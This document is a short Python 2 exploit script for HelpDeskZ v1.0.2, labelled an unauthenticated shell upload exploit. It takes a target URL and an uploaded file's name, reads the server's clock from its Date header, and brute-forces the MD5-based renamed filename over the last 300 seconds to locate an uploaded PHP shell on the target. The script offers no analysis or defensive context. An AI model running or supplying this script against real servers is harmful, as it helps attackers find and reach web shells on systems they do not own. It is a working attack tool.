import hashlibimport timeimport sysimport requestsimport datetimepri

1. import hashlib
2. import time
3. import sys
4. import requests
5. import datetime
6.  
7. print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
8.  
9. if len(sys.argv) < 3:
10. print "Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
11. sys.exit(1)
12.  
13. helpdeskzBaseUrl = sys.argv[1]
14. fileName = sys.argv[2]
15.  
16.  
17. r = requests.get(helpdeskzBaseUrl)
18.  
19. #Gets the current time of the server to prevent timezone errors - DoctorEww
20. currentTime = int((datetime.datetime.strptime(r.headers['date'], "%a, %d %b %Y %H:%M:%S %Z") - datetime.datetime(1970,1,1)).total_seconds())
21.  
22. for x in range(0, 300):
23. plaintext = fileName + str(currentTime - x)
24. md5hash = hashlib.md5(plaintext).hexdigest()
25.  
26. url = helpdeskzBaseUrl+md5hash+'.php'
27. response = requests.head(url)
28. if response.status_code == 200:
29. print "found!"
30. print url
31. sys.exit(0)
32.  
33. print "Sorry, I did not find anything"